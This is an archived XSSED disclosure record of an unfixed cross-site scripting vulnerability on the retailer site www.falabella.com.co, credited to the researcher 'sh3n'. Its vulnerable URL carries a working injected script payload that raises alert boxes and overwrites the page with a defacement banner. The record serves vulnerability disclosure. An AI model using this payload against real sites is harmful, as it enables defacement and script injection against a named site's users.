Unfixed XSS vulnerability at www.falabella.com.co

2010-10-28T00:00:00
ID XSSED:70287
Type xssed
Reporter sh3n
Modified 2011-12-20T00:00:00

Description

Security researcher sh3n submitted on 28/10/2010 a cross-site scripting (XSS) vulnerability affecting www.falabella.com.co, which at the time of submission ranked 32141 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 20/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.falabella.com.co/falabella-co/browse/searchResult.jsp;jsessionid=34F5840CBD71E668BE8C91A90AF15BB4.node3?_dyncharset=iso-8859-1&texto-busqueda=x280%29%27,length:1}%3Cscript%3Ealert%28%22pwned%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%22%29%3C/script%3E%3Cscript%3Ealert%28%22sh3n%22%29%3C/script%3E%3Cscript%3Efunction%20do_main%28%29{document.body.innerHTML=%22%3Ch1%3EXSHacked%20by%20sh3n%22}do_main%28%29;%3C/script%3Ereturn_result&_D%3Atexto-busqueda=+&docSort=numprop&_D%3AdocSort=+&pageSize=16&_D%3ApageSize=+&docSortOrder=ascending&_D%3AdocSortOrder=+&docSortProp=price&_D%3AdocSortProp=+&%2Fatg%2Fcommerce%2Fsearch%2Fcatalog%2FQueryFormHandler.search=Search&_D%3A%2Fatg%2Fcommerce%2Fsearch%2Fcatalog%2FQueryFormHandler.search=+&_DARGS=%2Ffalabella-co%2Fsearch%2Fincludes%2Fsearch.jsp.searchForm